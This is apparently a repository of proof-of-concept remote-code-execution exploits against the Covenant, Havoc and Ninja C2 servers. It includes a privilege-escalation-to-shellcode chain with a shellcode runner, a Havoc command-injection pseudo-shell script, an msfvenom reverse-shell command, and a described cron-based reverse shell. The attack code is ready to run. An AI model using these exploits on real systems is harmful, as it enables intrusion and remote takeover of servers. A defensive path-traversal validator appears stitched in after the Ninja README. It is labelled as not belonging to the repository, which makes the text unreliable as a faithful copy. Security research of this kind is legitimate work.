├── README.md
├── covenant_priv_esc_auth_rce
│   ├── README.md
│   ├── ShellcodeAssembly
│   │   ├── .gitignore
│   │   ├── ShellcodeAssembly.sln
│   │   └── ShellcodeAssembly
│   │       ├── Properties
│   │       │   └── AssemblyInfo.cs
│   │       ├── Shellcode.cs
│   │       └── ShellcodeAssembly.csproj
│   ├── covenant_rce.py
│   └── poc.gif
├── havoc_auth_rce
│   ├── README.md
│   ├── demo.png
│   ├── havoc_rce.py
│   └── poc.gif
├── ninja_rce
│   ├── README.md
│   ├── ninja_poc.py
│   └── poc.gif
├── shad0w_rce
│   ├── README.md
│   └── poc.gif
└── sliver_auth_rce
    ├── README.md
    └── poc.gif

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# C2 Vulnerabilities

PoCs of RCEs against open source C2 servers.

See https://blog.includesecurity.com/2024/09/vulnerabilities-in-open-source-c2-frameworks/

--------------------------------------------------------------------------------
/covenant_priv_esc_auth_rce/README.md:
--------------------------------------------------------------------------------
# Covenant Low Privileged User RCE

![](poc.gif)

Both the current [master](https://github.com/cobbr/Covenant/tree/5decc3ccfab04e6e881ed00c9de649740dac8ad1) and [dev](https://github.com/cobbr/Covenant/tree/bcb9a6c79ff629f939e22bb314ff2d2d9a7fe7bb) branches of Covenant are vulnerable to an escalation of privilege from User to Administrator. The API [blocks editing roles](https://github.com/cobbr/Covenant/blob/5decc3ccfab04e6e881ed00c9de649740dac8ad1/Covenant/Controllers/ApiControllers/CovenantUserApiController.cs#L298) unless you are an Administrator; however, in the UI itself it is [possible for a User to give themselves the Administrator role](https://github.com/cobbr/Covenant/blob/5decc3ccfab04e6e881ed00c9de649740dac8ad1/Covenant/Components/CovenantUsers/EditCovenantUser.razor).

With the Administrator role, the user has access to the most powerful feature of Covenant, the ability to create HTTP profiles. This feature is [restricted to Administrators](https://github.com/cobbr/Covenant/blob/5decc3ccfab04e6e881ed00c9de649740dac8ad1/Covenant/Core/CovenantService.cs#L3616). Although there is no built-in way to get a shell on a Covenant server, the HTTP profiles feature essentially enables running C# code on the server as a way of customizing traffic sent to and from implants.

The C# code is limited by the fact that the built-in Covenant compiler [restricts the `System` namespace](https://github.com/cobbr/Covenant/blob/5decc3ccfab04e6e881ed00c9de649740dac8ad1/Covenant/Core/Common.cs#L85) to `System.Private.CoreLib.dll`, which means `Process` can't be used directly. However, [previous excellent research](https://web.archive.org/web/20220126104152/https://blog.null.farm/hunting-the-hunters) on Covenant by 0xcoastal found a blog post by Tim MalcomVetter showing that only the `Activator` and `Assembly` classes are required to perform process injection of arbitrary .NET assemblies.

The privilege escalation part of this attack must be performed manually, as only the Blazor UI is vulnerable and not the API, and the Blazor UI is a pain to automate.

The RCE is automated by `covenant_rce.py`, which interacts with the API to create an HTTP profile and an HTTP listener, then communicates with the listener to trigger a provided .NET assembly to run.

## Reproduction

1. In the Covenant UI, escalate privileges from User to Administrator by clicking Users -> Your Username -> Roles -> Administrator -> Edit Roles
2. In `covenant_rce.py`, edit the variables at the top of the script
3. Generate C# shellcode, e.g. `msfvenom -f csharp -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=443 EXITFUNC=thread`
4. Copy the shellcode buffer into `Shellcode.cs` and compile the `ShellcodeAssembly` project in Release mode in Visual Studio
5. Run `python covenant_rce.py`

## References

* https://web.archive.org/web/20220126104152/https://blog.null.farm/hunting-the-hunters
* https://github.com/malcomvetter/ManagedInjection

--------------------------------------------------------------------------------
/covenant_priv_esc_auth_rce/ShellcodeAssembly/.gitignore:
--------------------------------------------------------------------------------
```
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
##
## Get latest from https://github.com/github/gitignore/blob/main/VisualStudio.gitignore

# User-specific files
*.rsuser
*.suo
*.user
*.userosscache
*.sln.docstates

# User-specific files (MonoDevelop/Xamarin Studio)
*.userprefs

# Mono auto generated files
mono_crash.*

# Build results
[Dd]ebug/
[Dd]ebugPublic/
[Rr]elease/
[Rr]eleases/
x64/
x86/
[Ww][Ii][Nn]32/
[Aa][Rr][Mm]/
[Aa][Rr][Mm]64/
bld/
[Bb]in/
[Oo]bj/
[Ll]og/
[Ll]ogs/

# Visual Studio 2015/2017 cache/options directory
.vs/
# Uncomment if you have tasks that create the project's static files in wwwroot
#wwwroot/

# Visual Studio 2017 auto generated files
Generated\ Files/

# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*

# NUnit
*.VisualState.xml
TestResult.xml
nunit-*.xml

# Build Results of an ATL Project
[Dd]ebugPS/
[Rr]eleasePS/
dlldata.c

# Benchmark Results
BenchmarkDotNet.Artifacts/

# .NET Core
project.lock.json
project.fragment.lock.json
artifacts/

# ASP.NET Scaffolding
ScaffoldingReadMe.txt

# StyleCop
StyleCopReport.xml

# Files built by Visual Studio
*_i.c
*_p.c
*_h.h
*.ilk
*.meta
*.obj
*.iobj
*.pch
*.pdb
*.ipdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*_wpftmp.csproj
*.log
*.tlog
*.vspscc
*.vssscc
.builds
*.pidb
*.svclog
*.scc

# Chutzpah Test files
_Chutzpah*

# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opendb
*.opensdf
*.sdf
*.cachefile
*.VC.db
*.VC.VC.opendb

# Visual Studio profiler
*.psess
*.vsp
*.vspx
*.sap

# Visual Studio Trace Files
*.e2e

# TFS 2012 Local Workspace
$tf/

# Guidance Automation Toolkit
*.gpState

# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
*.DotSettings.user

# TeamCity is a build add-in
_TeamCity*

# DotCover is a Code Coverage Tool
*.dotCover

# AxoCover is a Code Coverage Tool
.axoCover/*
!.axoCover/settings.json

# Coverlet is a free, cross platform Code Coverage Tool
coverage*.json
coverage*.xml
coverage*.info

# Visual Studio code coverage results
*.coverage
*.coveragexml

# NCrunch
_NCrunch_*
.*crunch*.local.xml
nCrunchTemp_*

# MightyMoose
*.mm.*
AutoTest.Net/

# Web workbench (sass)
.sass-cache/

# Installshield output folder
[Ee]xpress/

# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html

# Click-Once directory
publish/

# Publish Web Output
*.[Pp]ublish.xml
*.azurePubxml
# Note: Comment the next line if you want to checkin your web deploy settings,
# but database connection strings (with potential passwords) will be unencrypted
*.pubxml
*.publishproj

# Microsoft Azure Web App publish settings. Comment the next line if you want to
# checkin your Azure Web App publish settings, but sensitive information contained
# in these scripts will be unencrypted
PublishScripts/

# NuGet Packages
*.nupkg
# NuGet Symbol Packages
*.snupkg
# The packages folder can be ignored because of Package Restore
**/[Pp]ackages/*
# except build/, which is used as an MSBuild target.
!**/[Pp]ackages/build/
# Uncomment if necessary however generally it will be regenerated when needed
#!**/[Pp]ackages/repositories.config
# NuGet v3's project.json files produces more ignorable files
*.nuget.props
*.nuget.targets

# Microsoft Azure Build Output
csx/
*.build.csdef

# Microsoft Azure Emulator
ecf/
rcf/

# Windows Store app package directories and files
AppPackages/
BundleArtifacts/
Package.StoreAssociation.xml
_pkginfo.txt
*.appx
*.appxbundle
*.appxupload

# Visual Studio cache files
# files ending in .cache can be ignored
*.[Cc]ache
# but keep track of directories ending in .cache
!?*.[Cc]ache/

# Others
ClientBin/
~$*
*~
*.dbmdl
*.dbproj.schemaview
*.jfm
*.pfx
*.publishsettings
orleans.codegen.cs

# Including strong name files can present a security risk
# (https://github.com/github/gitignore/pull/2483#issue-259490424)
#*.snk

# Since there are multiple workflows, uncomment next line to ignore bower_components
# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
#bower_components/

# RIA/Silverlight projects
Generated_Code/

# Backup & report files from converting an old project file
# to a newer Visual Studio version. Backup files are not needed,
# because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
ServiceFabricBackup/
*.rptproj.bak

# SQL Server files
*.mdf
*.ldf
*.ndf

# Business Intelligence projects
*.rdl.data
*.bim.layout
*.bim_*.settings
*.rptproj.rsuser
*- [Bb]ackup.rdl
*- [Bb]ackup ([0-9]).rdl
*- [Bb]ackup ([0-9][0-9]).rdl

# Microsoft Fakes
FakesAssemblies/

# GhostDoc plugin setting file
*.GhostDoc.xml

# Node.js Tools for Visual Studio
.ntvs_analysis.dat
node_modules/

# Visual Studio 6 build log
*.plg

# Visual Studio 6 workspace options file
*.opt

# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
*.vbw

# Visual Studio 6 auto-generated project file (contains which files were open etc.)
*.vbp

# Visual Studio 6 workspace and project file (working project files containing files to include in project)
*.dsw
*.dsp

# Visual Studio 6 technical files
*.ncb
*.aps

# Visual Studio LightSwitch build output
**/*.HTMLClient/GeneratedArtifacts
**/*.DesktopClient/GeneratedArtifacts
**/*.DesktopClient/ModelManifest.xml
**/*.Server/GeneratedArtifacts
**/*.Server/ModelManifest.xml
_Pvt_Extensions

# Paket dependency manager
.paket/paket.exe
paket-files/

# FAKE - F# Make
.fake/

# CodeRush personal settings
.cr/personal

# Python Tools for Visual Studio (PTVS)
__pycache__/
*.pyc

# Cake - Uncomment if you are using it
# tools/**
# !tools/packages.config

# Tabs Studio
*.tss

# Telerik's JustMock configuration file
*.jmconfig

# BizTalk build output
*.btp.cs
*.btm.cs
*.odx.cs
*.xsd.cs

# OpenCover UI analysis results
OpenCover/

# Azure Stream Analytics local run output
ASALocalRun/

# MSBuild Binary and Structured Log
*.binlog

# NVidia Nsight GPU debugger configuration file
*.nvuser

# MFractors (Xamarin productivity tool) working folder
.mfractor/

# Local History for Visual Studio
.localhistory/

# Visual Studio History (VSHistory) files
.vshistory/

# BeatPulse healthcheck temp database
healthchecksdb

# Backup folder for Package Reference Convert tool in Visual Studio 2017
MigrationBackup/

# Ionide (cross platform F# VS Code tools) working folder
.ionide/

# Fody - auto-generated XML schema
FodyWeavers.xsd

# VS Code files for those working on multiple tools
.vscode/*
!.vscode/settings.json
!.vscode/tasks.json
!.vscode/launch.json
!.vscode/extensions.json
*.code-workspace

# Local History for Visual Studio Code
.history/

# Windows Installer files from build outputs
*.cab
*.msi
*.msix
*.msm
*.msp

# JetBrains Rider
*.sln.iml
```

--------------------------------------------------------------------------------
/covenant_priv_esc_auth_rce/ShellcodeAssembly/ShellcodeAssembly.sln:
--------------------------------------------------------------------------------
```
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 17
VisualStudioVersion = 17.8.34330.188
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ShellcodeAssembly", "ShellcodeAssembly\ShellcodeAssembly.csproj", "{44A1F6FE-64B5-41F2-9DCC-5134D12C2F12}"
EndProject
Global
	GlobalSection(SolutionConfigurationPlatforms) = preSolution
		Debug|Any CPU = Debug|Any CPU
		Release|Any CPU = Release|Any CPU
	EndGlobalSection
	GlobalSection(ProjectConfigurationPlatforms) = postSolution
		{44A1F6FE-64B5-41F2-9DCC-5134D12C2F12}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
		{44A1F6FE-64B5-41F2-9DCC-5134D12C2F12}.Debug|Any CPU.Build.0 = Debug|Any CPU
		{44A1F6FE-64B5-41F2-9DCC-5134D12C2F12}.Release|Any CPU.ActiveCfg = Release|Any CPU
		{44A1F6FE-64B5-41F2-9DCC-5134D12C2F12}.Release|Any CPU.Build.0 = Release|Any CPU
	EndGlobalSection
	GlobalSection(SolutionProperties) = preSolution
		HideSolutionNode = FALSE
	EndGlobalSection
	GlobalSection(ExtensibilityGlobals) = postSolution
		SolutionGuid = {DAB50E32-2EEA-4D1B-B2D4-599AD9C36CDE}
	EndGlobalSection
EndGlobal
```

--------------------------------------------------------------------------------
/covenant_priv_esc_auth_rce/ShellcodeAssembly/ShellcodeAssembly/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
```csharp
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;

// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("ClassLibrary1")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("ClassLibrary1")]
[assembly: AssemblyCopyright("Copyright © 2024")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("44a1f6fe-64b5-41f2-9dcc-5134d12c2f12")]

// Version information for an assembly consists of the following four values:
//
//      Major Version
//      Minor Version
//      Build Number
//      Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
```

--------------------------------------------------------------------------------
/covenant_priv_esc_auth_rce/ShellcodeAssembly/ShellcodeAssembly/Shellcode.cs:
--------------------------------------------------------------------------------
```csharp
// https://gist.github.com/matterpreter/03e2bd3cf8b26d57044f3b494e73bbea
using System;
using System.Runtime.InteropServices;

namespace ShellcodeAssembly
{
    public class Shellcode
    {
        public void Main(string[] args)
        {
            // msfvenom -f csharp -p windows/x64/exec CMD=calc.exe EXITFUNC=thread
            byte[] buf = new byte[276] {0xfc,0x48,0x83,0xe4,0xf0,0xe8,
            0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,
            0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
            0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,
            0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,
            0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,
            0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,
            0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
            0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,
            0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,
            0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,
            0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,
            0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
            0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,
            0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,
            0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,
            0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
            0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
            0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,
            0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,
            0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,
            0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,
            0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
            0x63,0x2e,0x65,0x78,0x65,0x00};


            IntPtr funcAddr = VirtualAlloc(
                IntPtr.Zero,
                (ulong)buf.Length,
                (uint)StateEnum.MEM_COMMIT,
                (uint)Protection.PAGE_EXECUTE_READWRITE);
            Marshal.Copy(buf, 0, (IntPtr)(funcAddr), buf.Length);

            IntPtr hThread = IntPtr.Zero;
            uint threadId = 0;
            IntPtr pinfo = IntPtr.Zero;

            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
            WaitForSingleObject(hThread, 0xFFFFFFFF);
            return;
        }

        #region pinvokes
        [DllImport("kernel32.dll")]
        private static extern IntPtr VirtualAlloc(
            IntPtr lpStartAddr,
            ulong size,
            uint flAllocationType,
            uint flProtect);

        [DllImport("kernel32.dll")]
        private static extern IntPtr CreateThread(
            uint lpThreadAttributes,
            uint dwStackSize,
            IntPtr lpStartAddress,
            IntPtr param,
            uint dwCreationFlags,
            ref uint lpThreadId);

        [DllImport("kernel32.dll")]
        private static extern uint WaitForSingleObject(
            IntPtr hHandle,
            uint dwMilliseconds);

        public enum StateEnum
        {
            MEM_COMMIT = 0x1000,
            MEM_RESERVE = 0x2000,
            MEM_FREE = 0x10000
        }

        public enum Protection
        {
            PAGE_READONLY = 0x02,
            PAGE_READWRITE = 0x04,
            PAGE_EXECUTE = 0x10,
            PAGE_EXECUTE_READ = 0x20,
            PAGE_EXECUTE_READWRITE = 0x40,
        }
        #endregion
    }
}
```

--------------------------------------------------------------------------------
/covenant_priv_esc_auth_rce/ShellcodeAssembly/ShellcodeAssembly/ShellcodeAssembly.csproj:
--------------------------------------------------------------------------------
```
Debug
AnyCPU
{44A1F6FE-64B5-41F2-9DCC-5134D12C2F12}
Library
Properties
ShellcodeAssembly
ShellcodeAssembly
v4.7.2
512
true

true
full
false
bin\Debug\
DEBUG;TRACE
prompt
4

pdbonly
true
bin\Release\
TRACE
prompt
4
```

--------------------------------------------------------------------------------
/covenant_priv_esc_auth_rce/covenant_rce.py:
--------------------------------------------------------------------------------
```python
import base64
import random
import requests
import urllib3
import uuid
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

SERVER_URL = "192.168.0.227"
COVENANT_PORT = 7443
USERNAME = "hyper"
PASSWORD = "admin"

with open('./ShellcodeAssembly.dll', 'rb') as f:
    base64exploit = base64.b64encode(f.read()).decode()

url = f"https://{SERVER_URL}:{COVENANT_PORT}"
headers = {
    'accept': 'text/plain',
    'Content-Type': 'application/json-patch+json',
}

data = {"userName": USERNAME, "password": PASSWORD}

s = requests.Session()

response = s.post(f'{url}/api/users/login',
                  headers=headers, json=data, verify=False)
if not response.ok or not response.json()["success"]:
    print("Failed to login")
    print(response.text)
    exit()

token = response.json()["covenantToken"]
print(f"Fetched covenant token: {token}")

headers["Authorization"] = f"Bearer {token}"

transform = """public static class MessageTransform
{
    public static string Transform(byte[] bytes)
    {
        return System.Convert.ToBase64String(bytes);
    }
    public static byte[] Invert(string str)
    {
        try
        {
            string assemblyBase64 = " """ + base64exploit + """ ";
            var assemblyBytes = System.Convert.FromBase64String(assemblyBase64);
            var assembly = System.Reflection.Assembly.Load(assemblyBytes);
            foreach (var type in assembly.GetTypes()) {
                object instance = System.Activator.CreateInstance(type);
                object[] args = new object[] { new string[] { "" } };
                try {
                    type.GetMethod("Main").Invoke(instance, args);
                }
                catch {}
            }
        }
        catch {}
        return System.Convert.FromBase64String(str);
    }
}
"""

profile_id = random.randint(10000, 20000)
profile_name = str(uuid.uuid4())

data = {
    "id": profile_id,
    "name": profile_name,
    "description": "",
    "type": "HTTP",
    "messageTransform": transform,
    'httpUrls': [],
    'httpRequestHeaders': [],
    'httpResponseHeaders': [],
    'httpPostRequest': 'd={DATA}',
    'httpGetResponse': '\n \n Hello World!\n \n \n\n Hello World!\n\n\n // Hello World! {DATA}\n \n\n',
    'httpPostResponse': '\n \n Hello World!\n \n \n\n Hello World!\n\n\n // Hello World! {DATA}\n \n\n',
}

response = s.post(f'{url}/api/profiles/http',
                  headers=headers, json=data, verify=False)
if not response.ok:
    print(response.text)
    exit()

print(f"Created malicious profile name {profile_name}")

listener_port = random.randint(49999, 60000)

data = {
    "bindAddress": "0.0.0.0",
    "bindPort": listener_port,
    "connectAddresses": [
        "0.0.0.0"
    ],
    "connectPort": listener_port,
    "profileId": profile_id,
    "listenerTypeId": 1,
    "status": "Active"
}

response = s.post(f'{url}/api/listeners/http',
                  headers=headers, json=data, verify=False)
if not response.ok:
    print(response.text)
    exit()

print(f"Started Covenant listener on port {listener_port}")

print(f"Sending payload to trigger invert")

listener_url = f"http://{SERVER_URL}:{listener_port}"

data = f'd=e30K'
response = requests.post(
    f'{listener_url}/index.html?id=blabla', data=data, verify=False)
print(response)
print("Payload is triggered, 404 response to final request is expected")
```

--------------------------------------------------------------------------------
/covenant_priv_esc_auth_rce/poc.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/IncludeSecurity/c2-vulnerabilities/a91bef7db34deea10ea959183bb786d3d060c556/covenant_priv_esc_auth_rce/poc.gif
--------------------------------------------------------------------------------
/havoc_auth_rce/README.md:
--------------------------------------------------------------------------------
# Havoc RCE

Havoc is vulnerable to command injection enabling an authenticated user to execute commands on the Teamserver. Affects versions 0.3 up to the latest release 0.6.
Havoc's default profile contains hardcoded passwords, so a C2 operator careless enough to use the default profile on a public network can immediately be exploited.

![](poc.gif)

The Havoc Teamserver can compile custom agents on behalf of users. The [builder code](https://github.com/HavocFramework/Havoc/blob/ea3646e055eb1612dcc956130fd632029dbf0b86/teamserver/pkg/common/builder/builder.go) eventually passes the full compilation options to an `exec.Command()` [invocation of `sh -c`](https://github.com/HavocFramework/Havoc/blob/ea3646e055eb1612dcc956130fd632029dbf0b86/teamserver/pkg/common/builder/builder.go#L1066). Input options are sanitized, apart from the ["Service Name" field](https://github.com/HavocFramework/Havoc/blob/ea3646e055eb1612dcc956130fd632029dbf0b86/teamserver/pkg/common/builder/builder.go#L617) when generating service binaries.

## Reproduction

The `havoc_rce.py` PoC script automates the following steps and provides a pseudo shell (just set the variables at the top).

1. In the Havoc client UI, View > Listeners > Add (settings don't matter)
2. Go to Attack > Payload > Format Windows Service Exe
3. The injection is in the "Service Name" field, and should look something like `\" -mbla; CMD 1>&2 && false #`:
   - `\"` to exit out of the quotes
   - `-mbla` to cause the MinGW compilation to fail and not have to wait for it
   - `CMD 1>&2` with the chosen payload redirected to stderr
   - `&& false` to cause the command to fail and the server to send back the stderr output
   - `#` to comment out the parameters after our injection

--------------------------------------------------------------------------------
/havoc_auth_rce/demo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/IncludeSecurity/c2-vulnerabilities/a91bef7db34deea10ea959183bb786d3d060c556/havoc_auth_rce/demo.png
--------------------------------------------------------------------------------
/havoc_auth_rce/havoc_rce.py:
--------------------------------------------------------------------------------
```python
import hashlib
import json
import ssl
from websocket import create_connection  # pip install websocket-client

HOSTNAME = "192.168.167.129"
PORT = 40056
USER = "Neo"
PASSWORD = "password1234"

ws = create_connection(f"wss://{HOSTNAME}:{PORT}/havoc/",
                       sslopt={"cert_reqs": ssl.CERT_NONE, "check_hostname": False})

# Authenticate to teamserver
payload = {"Body": {"Info": {"Password": hashlib.sha3_256(PASSWORD.encode()).hexdigest(), "User": USER}, "SubEvent": 3}, "Head": {"Event": 1, "OneTime": "", "Time": "18:40:17", "User": USER}}
ws.send(json.dumps(payload))
print(json.loads(ws.recv()))

# Create a listener to build demon agent for
payload = {"Body":{"Info":{"Headers":"","HostBind":"0.0.0.0","HostHeader":"","HostRotation":"round-robin","Hosts":"0.0.0.0","Name":"abc","PortBind":"443","PortConn":"443","Protocol":"Https","Proxy Enabled":"false","Secure":"true","Status":"online","Uris":"","UserAgent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"},"SubEvent":1},"Head":{"Event":2,"OneTime":"","Time":"08:39:18","User": USER}}
ws.send(json.dumps(payload))

# Create a pseudo shell with RCE loop
while True:
    cmd = input("$ ")
    injection = """ \\\\\\\" -mbla; """ + cmd + """ 1>&2 && false #"""

    # Command injection in demon compilation command
    payload = {"Body": {"Info": {"AgentType": "Demon", "Arch": "x64", "Config": "{\n \"Amsi/Etw Patch\": \"None\",\n \"Indirect Syscall\": false,\n \"Injection\": {\n \"Alloc\": \"Native/Syscall\",\n \"Execute\": \"Native/Syscall\",\n \"Spawn32\": \"C:\\\\Windows\\\\SysWOW64\\\\notepad.exe\",\n \"Spawn64\": \"C:\\\\Windows\\\\System32\\\\notepad.exe\"\n },\n \"Jitter\": \"0\",\n \"Proxy Loading\": \"None (LdrLoadDll)\",\n \"Service Name\":\"" + injection + "\",\n \"Sleep\": \"2\",\n \"Sleep Jmp Gadget\": \"None\",\n \"Sleep Technique\": \"WaitForSingleObjectEx\",\n \"Stack Duplication\": false\n}\n", "Format": "Windows Service Exe", "Listener": "abc"}, "SubEvent": 2}, "Head": {
        "Event": 5, "OneTime": "true", "Time": "18:39:04", "User": USER}}
    ws.send(json.dumps(payload))
    while True:
        bla = ws.recv()
        if b"compile output" in bla:
            bla2 = json.loads(bla)
            # print(bla2)
            out = bla2["Body"]["Info"]["Message"].split("\n")
            # print(out)

            for line in out[1:]:
                print(line)
            break

ws.close()
```

--------------------------------------------------------------------------------
/havoc_auth_rce/poc.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/IncludeSecurity/c2-vulnerabilities/a91bef7db34deea10ea959183bb786d3d060c556/havoc_auth_rce/poc.gif
--------------------------------------------------------------------------------
/ninja_rce/README.md:
--------------------------------------------------------------------------------
# Ninja Unauthenticated Arbitrary File Write RCE

Ninja C2 is vulnerable to an unauthenticated arbitrary file write. This can immediately be used to gain RCE against the Teamserver if it is running as root; if not, RCE can be gained the next time a C2 operator restarts the C2 server.

The vulnerability is reminiscent of the [Skywalker](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/empire_skywalker.rb) vulnerability against Empire C2 from 2016.

![](poc.gif)

## Reproduction

The vulnerability is in the [download route](https://github.com/ahmedkhlief/Ninja/blob/master/core/webserver.py#L321) of the public-facing C2 webserver, which does not check for filepath traversal in a `filename` provided by a connected C2 agent.

First, a malicious agent needs to register with the C2 server at the [info route](https://github.com/ahmedkhlief/Ninja/blob/master/core/webserver.py#L179). The C2 webserver obfuscates itself by randomizing the URL paths of each endpoint from the following [list](https://github.com/ahmedkhlief/Ninja/blob/master/utils/links.txt), so we try each path until one returns an AES encryption key.

Next we encrypt the target file, specify a path traversal sequence to overwrite an arbitrary filepath on the server, and try URL paths again until hitting the download endpoint.

The `ninja_poc.py` script automates these steps. The example payload assumes the server is running as root and uses the same technique as the Skywalker exploit, which writes a Python reverse shell to `/etc/cron.d`. If the server is not running as root, an alternative would be to overwrite a server source file and wait until the server is restarted.
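The download route described above trusts the agent-supplied filename and writes wherever it points. As an added example (not code from Ninja or from this repository), the following shows the containment check a C2 webserver should apply before touching the filesystem: resolve the requested name under a fixed downloads directory and refuse anything that escapes it. The `handle_download` function, the scratch directory and the form-field names are assumptions modelled on the `resource`/`d`/`f` fields the PoC posts; the traversal sample is constructed.

```python
import os
import tempfile

# Constructed sample with the shape of the 'f' value the PoC posts to the download route.
TRAVERSAL_FILENAME = "../../../../../../../../../../etc/cron.d/pwned"


class PathTraversalError(ValueError):
    """Raised when an agent-supplied filename resolves outside the allowed directory."""


def resolve_download_path(base_dir: str, filename: str) -> str:
    """Return the absolute path of filename inside base_dir, or raise.

    Rejects empty names, embedded NUL bytes, absolute paths and any '..'
    sequence that leaves base_dir after normalisation. realpath() also
    follows symlinks, so a link planted inside the directory cannot be
    used to redirect the write.
    """
    if not filename or "\x00" in filename:
        raise PathTraversalError("empty filename or embedded NUL byte")
    if os.path.isabs(filename):
        raise PathTraversalError("absolute path rejected: %r" % (filename,))

    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, filename))

    # commonpath() is the robust containment test; a plain startswith() check
    # would accept "/srv/downloads_evil/x" as being inside "/srv/downloads".
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        raise PathTraversalError("path traversal rejected: %r" % (filename,))
    return candidate


def is_rejected(base_dir: str, filename: str) -> bool:
    """True if resolve_download_path() refuses the name."""
    try:
        resolve_download_path(base_dir, filename)
    except PathTraversalError:
        return True
    return False


def handle_download(base_dir: str, form: dict):
    """Hypothetical hardened handler for the PoC's 'resource'/'d'/'f' fields.

    The real route would first decrypt 'd' with the agent's key; here the raw
    value is written because the check under discussion is the path, not the
    crypto. Returns an (HTTP status, body) pair.
    """
    if not str(form.get("resource", "")).isdigit():
        return 400, "Bad Request"
    try:
        target = resolve_download_path(base_dir, form.get("f", ""))
    except PathTraversalError:
        # Fail closed; log server-side rather than echoing the path to the agent.
        return 400, "Bad Request"
    with open(target, "wb") as fh:
        fh.write(str(form.get("d", "")).encode())
    return 200, "OK"


def demo() -> dict:
    """Run a benign, a traversal and an absolute-path request against a scratch directory."""
    base = tempfile.mkdtemp(prefix="downloads_")
    benign = handle_download(base, {"resource": "4242", "d": "constructed data", "f": "loot.txt"})
    hostile = handle_download(base, {"resource": "4242", "d": "constructed data", "f": TRAVERSAL_FILENAME})
    absolute = handle_download(base, {"resource": "4242", "d": "constructed data", "f": "/etc/cron.d/pwned"})
    return {
        "benign_status": benign[0],
        "benign_written": os.path.isfile(os.path.join(base, "loot.txt")),
        "hostile_status": hostile[0],
        "absolute_status": absolute[0],
    }


if __name__ == "__main__":
    print(demo())
```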
--------------------------------------------------------------------------------
/ninja_rce/ninja_poc.py:
